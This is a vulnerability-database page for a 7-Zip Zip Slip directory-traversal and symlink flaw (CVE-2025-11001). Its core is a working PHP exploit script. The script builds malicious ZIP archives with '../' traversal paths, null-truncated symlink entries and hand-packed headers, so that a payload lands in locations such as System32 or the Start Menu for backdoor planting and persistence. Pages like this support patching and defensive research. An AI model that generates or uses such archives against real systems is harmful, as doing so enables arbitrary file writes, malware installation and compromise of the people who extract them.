Lucene search
+L

📄 7-Zip 25.00 Zip Slip Directory Traversal

🗓️ 26 Nov 2025 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 206 Views

7-Zip before 25.00 has Zip Slip with traversal and symlink, null-byte truncation enabling writes.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2025-11001
20 Nov 202504:16
–githubexploit
GithubExploit
Exploit for CVE-2025-11001
22 Nov 202517:58
–githubexploit
GithubExploit
Exploit for CVE-2025-11001
24 Nov 202513:55
–githubexploit
GithubExploit
Exploit for CVE-2025-11001
14 Oct 202509:25
–githubexploit
GithubExploit
Exploit for Path Traversal in 7-Zip
12 Dec 202516:49
–githubexploit
GithubExploit
Exploit for CVE-2025-11001
15 Oct 202512:14
–githubexploit
GithubExploit
Exploit for CVE-2025-11001
22 Nov 202510:13
–githubexploit
Tenable Nessus
7-Zip < 25.00
23 Jul 202500:00
–nessus
Tenable Nessus
Amazon Linux 2023 : p7zip, p7zip-plugins (ALAS2023-2025-1250)
28 Oct 202500:00
–nessus
Tenable Nessus
Amazon Linux 2023 : 7zip, 7zip-reduced, 7zip-standalone (ALAS2023-2025-1251)
28 Oct 202500:00
–nessus
Rows per page
=============================================================================================================================================
    | # Title     : 7-Zip 25.00 Zip Slip Symlink Directory Traversal Vulnerability                                                              |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.7-zip.org/                                                                                                      |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/211932/ & CVE-2025-11001 
    
    [+] Summary :
    
    Multiple archive extraction implementations, including 7‑Zip versions prior to 25.00 and several ZIP libraries, improperly sanitize file paths during extraction.
    An attacker can craft a malicious ZIP archive containing:
    
    Directory traversal sequences (../../../)
    
    Symlink entries
    
    Manipulated extra fields
    
    Null‑byte terminated link targets
    
    This allows files to be extracted outside the intended extraction folder and written to arbitrary locations on the victim system.
    
    [+] Vulnerability Class :
    
    Directory Traversal
    
    Arbitrary File Write
    
    Symlink Path Injection
    
    Null-byte truncation bug
    
    [+]  Affected Software :
    
    7‑Zip < 25.00 (Administrator-only exploitation on Windows)
    
    Any ZIP extraction tool vulnerable to Zip Slip (Java, PHP, Python, WinRAR variants...)
    
    Applications that use ZipArchive without proper sanitization
    
    [+] Impact
    
    A malicious ZIP archive allows an attacker to place files in arbitrary locations such as
    
    C:\Windows\System32\
    C:\ProgramData\Microsoft\Windows\Start Menu\
    /etc/
    /var/www/html/
    
    
    [+] Possible consequences:
    
        Backdoor planting
    
        Privilege escalation
    
        Persistence via startup folders
    
        Overwriting sensitive files
    
        Gaining remote execution depending on file location created
    
    [+] Technical Details
    
    [+] Core Exploit Mechanism
    
    The attacker inserts filenames such as : ../../../../Windows/System32/evil.exe
    
    or a symlink entry:  evil.lnk  →  ../../../../Users/Public/Documents\0
    
    These paths bypass validators in 7‑Zip and other ZIP extractors when running with elevated privileges.
    
    poc
    
    <?php
    /*
    ===========================================================
       By Indoushka (Nekaa Salah eddine)
    ===========================================================
    */
    
    /* ===========================================================
       MODE 1 — Basic Zip Slip Exploit
       (Former: build_zip duplicated 4 times)
    =========================================================== */
    function poc_zip_slip($target_path, $payload_file, $output_zip)
    {
        if (!file_exists($payload_file)) { die("[-] Payload not found\n"); }
    
        $payload_name = basename($payload_file);
        $payload_data = file_get_contents($payload_file);
    
        $target = trim(str_replace("\\", "/", $target_path), "/") . "/";
        $traversal = "../../../../" . $target;
    
        $zip = new ZipArchive();
        if ($zip->open($output_zip, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== TRUE) {
            die("[-] Failed to create ZIP\n");
        }
    
        $zip->addFromString($traversal . $payload_name, $payload_data);
        $zip->close();
    
        echo "[+] PoC: Zip Slip ZIP created: $output_zip\n";
    }
    
    
    /* ===========================================================
       MODE 2 — Manual Symlink ZIP Creator
    =========================================================== */
    function poc_symlink_zip($target_path, $output_zip)
    {
        $target = trim(str_replace("\\", "/", $target_path), "/") . "/";
        $traversal = "../../../../" . $target;
    
        $name = "evil.lnk";
        $link = $traversal . "\x00";
    
        $extra  = pack("v", 0x756e);
        $extra .= pack("v", strlen($link));
        $extra .= $link;
    
        $local = pack("VvvvvvVVVvv",
            0x04034b50, 20, 0x800, 0x800, 0,0,0,0,0,
            strlen($name), strlen($extra)
        );
    
        file_put_contents($output_zip, $local . $name . $extra);
    
        echo "[+] PoC: Symlink ZIP created: $output_zip\n";
    }
    
    
    /* ===========================================================
       MODE 3 — Full Manual ZIP Builder (Symlink + Payload)
    =========================================================== */
    function poc_manual_zip($target_path, $payload_file, $output_zip)
    {
        if (!file_exists($payload_file)) { die("[-] Missing payload\n"); }
    
        $payload_name  = basename($payload_file);
        $payload_data  = file_get_contents($payload_file);
    
        $target = trim(str_replace("\\", "/", $target_path), "/") . "/";
        $trav   = "../../../../" . $target;
    
        $ln_name   = "evil.lnk";
        $ln_target = $trav . "\x00";
        $ln_extra  = pack("v", 0x756e).pack("v",strlen($ln_target)).$ln_target;
    
        $f = fopen($output_zip, "wb");
        $off = 0;
    
        // Local: Symlink
        $h1 = pack("VvvvvvVVVvv",
            0x04034b50,20,0x800,0x800,0,0,0,0,0,strlen($ln_name),strlen($ln_extra)
        );
        fwrite($f, $h1.$ln_name.$ln_extra);
        $symlink_offset = $off;
        $off += strlen($h1)+strlen($ln_name)+strlen($ln_extra);
    
        // Local: Payload
        $h2 = pack("VvvvvvVVVvv",
            0x04034b50,20,0x800,0,0,0,0,strlen($payload_data),strlen($payload_data),
            strlen($payload_name),0
        );
        fwrite($f, $h2.$payload_name.$payload_data);
        $payload_offset = $off;
        $off += strlen($h2)+strlen($payload_name)+strlen($payload_data);
    
        // Central Directory
        $cd_start = $off;
    
        // CD: Symlink
        $cd1 = pack("VvvvvvVVVvvvvvVV",
            0x02014b50,0x0317,20,0x800,0,0,0,0,0,0,
            strlen($ln_name),strlen($ln_extra),0,0,0,(0777<<16)|0xA1ED,$symlink_offset
        );
        fwrite($f, $cd1.$ln_name.$ln_extra);
    
        // CD: Payload
        $cd2 = pack("VvvvvvVVVvvvvvVV",
            0x02014b50,0x0317,20,0x800,0,0,0,0,
            strlen($payload_data),strlen($payload_data),
            strlen($payload_name),0,0,0,0,(0777<<16),$payload_offset
        );
        fwrite($f, $cd2.$payload_name);
    
        // EOCD
        $eocd = pack("VvvvvVVv",
            0x06054b50,0,0,2,2,$off,$cd_start,0
        );
        fwrite($f, $eocd);
        fclose($f);
    
        echo "[+] PoC: Manual ZIP generated: $output_zip\n";
    }
    
    
    /* ===========================================================
       MODE 4 — CVE‑2025‑11001 (7-Zip Directory Traversal)
    =========================================================== */
    function poc_cve_2025_11001($target, $payload, $output)
    {
        poc_manual_zip($target, $payload, $output);
    
        echo "[+] CVE-2025-11001 Archive Ready\n";
    }
    
    
    /* ===========================================================
       CLI Controller
    =========================================================== */
    
    if (php_sapi_name() == "cli")
    {
        $args = getopt("", [
            "mode:",
            "target:",
            "payload::",
            "output::"
        ]);
    
        if (!isset($args["mode"])) {
            die("Usage:\n
    php exploit.php --mode=zip-slip     --target=DIR --payload=file --output=out.zip
    php exploit.php --mode=symlink      --target=DIR --output=out.zip
    php exploit.php --mode=manual       --target=DIR --payload=file --output=out.zip
    php exploit.php --mode=cve-2025-11001 --target=DIR --payload=file --output=exp.zip
    ");
        }
    
        $mode   = $args["mode"];
        $target = $args["target"] ?? null;
        $payload= $args["payload"] ?? null;
        $output = $args["output"] ?? "exploit.zip";
    
        switch ($mode) {
            case "zip-slip":
                poc_zip_slip($target, $payload, $output);
                break;
    
            case "symlink":
                poc_symlink_zip($target, $output);
                break;
    
            case "manual":
                poc_manual_zip($target, $payload, $output);
                break;
    
            case "cve-2025-11001":
                poc_cve_2025_11001($target, $payload, $output);
                break;
    
            default:
                echo "Unknown mode.\n";
        }
    }
    ?>
    
    
    Save as : poc.php
    
    run : php poc.php
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Nov 2025 00:00Current
7High risk
Vulners AI Score7
CVSS 3.17.8
CVSS 37
EPSS0.27357
SSVC
206